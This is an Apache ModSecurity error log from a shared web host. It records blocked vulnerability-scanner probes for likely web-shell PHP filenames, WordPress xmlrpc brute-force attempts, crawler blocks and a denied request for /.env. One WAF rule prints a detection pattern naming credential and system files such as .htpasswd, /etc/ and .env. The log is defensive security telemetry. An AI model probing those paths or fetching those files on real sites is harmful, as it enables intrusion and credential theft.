[Tue May 26 16:42:50.033635 2026] [security2:error] [pid 817651:tid 817890] [client 62.244.225.226:37936] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "cagmedya.com"] [uri "/index.php"] [unique_id "ahWAMdlGRCPPN1dS2y2tZgAAAPI"]
[Tue May 26 16:42:50.459968 2026] [security2:error] [pid 823496:tid 823700] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWAMJa08mrtyBNpA4PIYAAAAEg"]
[Tue May 26 16:42:50.704510 2026] [security2:error] [pid 823496:tid 823745] [client 176.65.139.235:18592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "sevenstar.onesoft.in"] [uri "/.env"] [unique_id "ahWAMpa08mrtyBNpA4PIlQAAAHU"]
[Tue May 26 16:42:51.187365 2026] [security2:error] [pid 823496:tid 823644] [client 20.195.199.65:22732] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/edit.php"] [unique_id "ahWAM5a08mrtyBNpA4PIngAAABA"]
[Tue May 26 16:42:51.187491 2026] [security2:error] [pid 823496:tid 823644] [client 20.195.199.65:22732] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dev.cicodev.org"] [uri "/edit.php"] [unique_id "ahWAM5a08mrtyBNpA4PIngAAABA"]
[Tue May 26 16:42:51.781479 2026] [security2:error] [pid 817651:tid 817788] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWAMdlGRCPPN1dS2y2tZAAAAIw"]
[Tue May 26 16:42:52.029062 2026] [security2:error] [pid 823496:tid 823652] [client 20.195.199.65:25620] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/wp-content/admin.php"] [unique_id "ahWANJa08mrtyBNpA4PIoQAAABg"]
[Tue May 26 16:42:52.029160 2026] [security2:error] [pid 823496:tid 823652] [client 20.195.199.65:25620] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dev.cicodev.org"] [uri "/wp-content/admin.php"] [unique_id "ahWANJa08mrtyBNpA4PIoQAAABg"]
[Tue May 26 16:42:53.459124 2026] [security2:error] [pid 817651:tid 817892] [client 20.195.199.65:34707] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/f6.php"] [unique_id "ahWANdlGRCPPN1dS2y2tlAAAAPQ"]
[Tue May 26 16:42:53.459248 2026] [security2:error] [pid 817651:tid 817892] [client 20.195.199.65:34707] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dev.cicodev.org"] [uri "/f6.php"] [unique_id "ahWANdlGRCPPN1dS2y2tlAAAAPQ"]
[Tue May 26 16:42:54.570161 2026] [security2:error] [pid 823496:tid 823721] [client 117.198.37.168:56210] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWANpa08mrtyBNpA4PIwQAAAF0"]
[Tue May 26 16:42:54.570304 2026] [security2:error] [pid 823496:tid 823721] [client 117.198.37.168:56210] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWANpa08mrtyBNpA4PIwQAAAF0"]
[Tue May 26 16:42:54.713384 2026] [security2:error] [pid 823496:tid 823667] [client 20.195.199.65:17433] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/inputs.php"] [unique_id "ahWANpa08mrtyBNpA4PIwgAAACc"]
[Tue May 26 16:42:54.713517 2026] [security2:error] [pid 823496:tid 823667] [client 20.195.199.65:17433] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dev.cicodev.org"] [uri "/inputs.php"] [unique_id "ahWANpa08mrtyBNpA4PIwgAAACc"]
[Tue May 26 16:42:54.954839 2026] [security2:error] [pid 817651:tid 817876] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWANNlGRCPPN1dS2y2thAAAAOQ"]
[Tue May 26 16:42:56.081763 2026] [security2:error] [pid 823496:tid 823674] [client 20.195.199.65:25639] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/av.php"] [unique_id "ahWAOJa08mrtyBNpA4PI1AAAAC4"]
[Tue May 26 16:42:56.081910 2026] [security2:error] [pid 823496:tid 823674] [client 20.195.199.65:25639] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dev.cicodev.org"] [uri "/av.php"] [unique_id "ahWAOJa08mrtyBNpA4PI1AAAAC4"]
[Tue May 26 16:42:56.232675 2026] [security2:error] [pid 817651:tid 817849] [client 74.7.241.158:41690] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "singhcouriercargo.com"] [uri "/cgi-sys/404.html"] [unique_id "ahWAONlGRCPPN1dS2y2tnwAAyX8"]
[Tue May 26 16:42:56.272488 2026] [security2:error] [pid 823496:tid 823692] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWANpa08mrtyBNpA4PIuQAAAEA"]
[Tue May 26 16:42:57.040491 2026] [security2:error] [pid 823496:tid 823684] [client 20.195.199.65:13358] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/classwithtostring.php"] [unique_id "ahWAOZa08mrtyBNpA4PI6AAAADg"]
[Tue May 26 16:42:57.040611 2026] [security2:error] [pid 823496:tid 823684] [client 20.195.199.65:13358] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dev.cicodev.org"] [uri "/classwithtostring.php"] [unique_id "ahWAOZa08mrtyBNpA4PI6AAAADg"]
[Tue May 26 16:42:57.690912 2026] [security2:error] [pid 823496:tid 823559] [remote 74.7.241.58:46954] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahWAOZa08mrtyBNpA4PI7wAAOTw"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/shop/wp-includes/IXR
[Tue May 26 16:42:57.949464 2026] [security2:error] [pid 823496:tid 823689] [client 20.195.199.65:16852] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/wp-content/themes/index.php"] [unique_id "ahWAOZa08mrtyBNpA4PI9gAAAD0"]
[Tue May 26 16:42:57.949604 2026] [security2:error] [pid 823496:tid 823689] [client 20.195.199.65:16852] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dev.cicodev.org"] [uri "/wp-content/themes/index.php"] [unique_id "ahWAOZa08mrtyBNpA4PI9gAAAD0"]
[Tue May 26 16:42:58.334188 2026] [security2:error] [pid 823496:tid 823714] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWAOJa08mrtyBNpA4PI1gAAAFY"]
[Tue May 26 16:42:58.787934 2026] [security2:error] [pid 823496:tid 823672] [client 20.195.199.65:42730] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/wp-blog.php"] [unique_id "ahWAOpa08mrtyBNpA4PJAwAAACw"]
[Tue May 26 16:42:58.788054 2026] [security2:error] [pid 823496:tid 823672] [client 20.195.199.65:42730] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dev.cicodev.org"] [uri "/wp-blog.php"] [unique_id "ahWAOpa08mrtyBNpA4PJAwAAACw"]
[Tue May 26 16:42:59.036272 2026] [security2:error] [pid 817651:tid 817881] [client 79.117.193.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWAONlGRCPPN1dS2y2togAAAOk"]
[Tue May 26 16:43:00.003876 2026] [autoindex:error] [pid 817651:tid 817794] [client 20.195.199.65:25627] AH01276: Cannot serve directory /home1/cicode9a/public_html/dev/wp-includes/js/jquery/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 16:43:00.004516 2026] [security2:error] [pid 817651:tid 817794] [client 20.195.199.65:25627] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "dev.cicodev.org"] [uri "/cgi-sys/403.html"] [unique_id "ahWAO9lGRCPPN1dS2y2ttwAAAJI"]
[Tue May 26 16:43:00.188429 2026] [security2:error] [pid 817651:tid 817874] [client 20.195.199.65:25627] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/wp-content/admin.php"] [unique_id "ahWAPNlGRCPPN1dS2y2tvQAAAOI"]
[Tue May 26 16:43:00.188549 2026] [security2:error] [pid 817651:tid 817874] [client 20.195.199.65:25627] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dev.cicodev.org"] [uri "/wp-content/admin.php"] [unique_id "ahWAPNlGRCPPN1dS2y2tvQAAAOI"]
[Tue May 26 16:43:00.435122 2026] [security2:error] [pid 823496:tid 823730] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWAOZa08mrtyBNpA4PI8gAAAGY"]
[Tue May 26 16:43:01.284764 2026] [security2:error] [pid 823496:tid 823636] [client 20.195.199.65:61577] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/adminfuns.php"] [unique_id "ahWAPZa08mrtyBNpA4PJSwAAAAg"]
[Tue May 26 16:43:01.284873 2026] [security2:error] [pid 823496:tid 823636] [client 20.195.199.65:61577] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dev.cicodev.org"] [uri "/adminfuns.php"] [unique_id "ahWAPZa08mrtyBNpA4PJSwAAAAg"]
[Tue May 26 16:43:02.077068 2026] [security2:error] [pid 823496:tid 823633] [client 20.195.199.65:25659] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/goods.php"] [unique_id "ahWAPpa08mrtyBNpA4PJWgAAAAU"]
[Tue May 26 16:43:02.077192 2026] [security2:error] [pid 823496:tid 823633] [client 20.195.199.65:25659] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dev.cicodev.org"] [uri "/goods.php"] [unique_id "ahWAPpa08mrtyBNpA4PJWgAAAAU"]
[Tue May 26 16:43:02.628179 2026] [security2:error] [pid 823496:tid 823647] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWAPJa08mrtyBNpA4PJQQAAABM"]
[Tue May 26 16:43:02.909940 2026] [security2:error] [pid 823496:tid 823724] [client 20.195.199.65:21944] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/ms-edit.php"] [unique_id "ahWAPpa08mrtyBNpA4PJYAAAAGA"]
[Tue May 26 16:43:02.910077 2026] [security2:error] [pid 823496:tid 823724] [client 20.195.199.65:21944] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dev.cicodev.org"] [uri "/ms-edit.php"] [unique_id "ahWAPpa08mrtyBNpA4PJYAAAAGA"]
[Tue May 26 16:43:03.742508 2026] [security2:error] [pid 823496:tid 823750] [client 20.195.199.65:23533] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/222.php"] [unique_id "ahWAP5a08mrtyBNpA4PJbAAAAHo"]
[Tue May 26 16:43:03.742634 2026] [security2:error] [pid 823496:tid 823750] [client 20.195.199.65:23533] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dev.cicodev.org"] [uri "/222.php"] [unique_id "ahWAP5a08mrtyBNpA4PJbAAAAHo"]
[Tue May 26 16:43:03.940065 2026] [security2:error] [pid 823496:tid 823686] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWAPZa08mrtyBNpA4PJUAAAADo"]
[Tue May 26 16:43:05.256064 2026] [security2:error] [pid 823496:tid 823641] [client 117.198.37.168:56528] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWAQZa08mrtyBNpA4PJggAAAA0"]
[Tue May 26 16:43:05.256238 2026] [security2:error] [pid 823496:tid 823641] [client 117.198.37.168:56528] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWAQZa08mrtyBNpA4PJggAAAA0"]
[Tue May 26 16:43:05.495132 2026] [security2:error] [pid 817651:tid 817902] [client 20.195.199.65:20176] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/cgi-bin/index.php"] [unique_id "ahWAQdlGRCPPN1dS2y2t6gAAAP4"]
[Tue May 26 16:43:05.495268 2026] [security2:error] [pid 817651:tid 817902] [client 20.195.199.65:20176] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dev.cicodev.org"] [uri "/cgi-bin/index.php"] [unique_id "ahWAQdlGRCPPN1dS2y2t6gAAAP4"]
[Tue May 26 16:43:05.578139 2026] [security2:error] [pid 823496:tid 823690] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWAP5a08mrtyBNpA4PJawAAAD4"]
[Tue May 26 16:43:08.024879 2026] [security2:error] [pid 817651:tid 817798] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWAQtlGRCPPN1dS2y2t8AAAAJY"]
[Tue May 26 16:43:08.249484 2026] [security2:error] [pid 823496:tid 823689] [client 216.244.66.241:36218] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.ghanemgh.com"] [uri "/dioptometrybcfd/dcecaa886264.shtml"] [unique_id "ahWARJa08mrtyBNpA4PJpQAAAD0"]
[Tue May 26 16:43:08.249665 2026] [security2:error] [pid 823496:tid 823689] [client 216.244.66.241:36218] ModSecurity: Warning. Matched phrase "Dotbot" at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.ghanemgh.com"] [uri "/dioptometrybcfd/dcecaa886264.shtml"] [unique_id "ahWARJa08mrtyBNpA4PJpQAAAD0"]
[Tue May 26 16:43:10.398503 2026] [security2:error] [pid 817651:tid 817904] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWARNlGRCPPN1dS2y2uEQAAAQA"]
[Tue May 26 16:43:11.780470 2026] [security2:error] [pid 823496:tid 823663] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWARZa08mrtyBNpA4PJvAAAACM"]
[Tue May 26 16:43:12.500907 2026] [security2:error] [pid 823496:tid 823640] [client 216.244.66.241:36246] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.ghanemgh.com"] [uri "/prespontaneousfbca/ecbefc1458556.shtml"] [unique_id "ahWASJa08mrtyBNpA4PJ5QAAAAw"]
[Tue May 26 16:43:12.501016 2026] [security2:error] [pid 823496:tid 823640] [client 216.244.66.241:36246] ModSecurity: Warning. Matched phrase "Dotbot" at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.ghanemgh.com"] [uri "/prespontaneousfbca/ecbefc1458556.shtml"] [unique_id "ahWASJa08mrtyBNpA4PJ5QAAAAw"]
[Tue May 26 16:43:13.196000 2026] [security2:error] [pid 817651:tid 817887] [client 74.7.175.133:59772] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "krishnawoodworks.com"] [uri "/cgi-sys/404.html"] [unique_id "ahWASdlGRCPPN1dS2y2uMQAA724"]
[Tue May 26 16:43:13.622366 2026] [security2:error] [pid 823496:tid 823743] [client 114.119.157.17:49891] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "aastha-enterprises.com"] [uri "/document.html"] [unique_id "ahWASZa08mrtyBNpA4PJ-AAAAHM"], referer: https://aastha-enterprises.com/
[Tue May 26 16:43:14.409033 2026] [security2:error] [pid 823496:tid 823517] [remote 216.73.216.30:33673] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/crm"] [unique_id "ahWASpa08mrtyBNpA4PKAgAAGRI"]
[Tue May 26 16:43:14.464077 2026] [security2:error] [pid 823496:tid 823579] [remote 216.73.216.30:33673] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWASpa08mrtyBNpA4PKAwAAGVA"]
[Tue May 26 16:43:14.514884 2026] [security2:error] [pid 823496:tid 823693] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWASJa08mrtyBNpA4PJ5AAAAEE"]
[Tue May 26 16:43:14.672880 2026] [security2:error] [pid 817651:tid 817895] [client 43.159.39.29:2954] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "panda-eco.com"] [uri "/wp-content/uploads/2024/05/privacy-policy.pdf"] [unique_id "ahWAStlGRCPPN1dS2y2uQAAAAPc"]
[Tue May 26 16:43:14.672979 2026] [security2:error] [pid 817651:tid 817895] [client 43.159.39.29:2954] ModSecurity: Warning. Matched phrase "Sogou web spider" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "panda-eco.com"] [uri "/wp-content/uploads/2024/05/privacy-policy.pdf"] [unique_id "ahWAStlGRCPPN1dS2y2uQAAAAPc"]
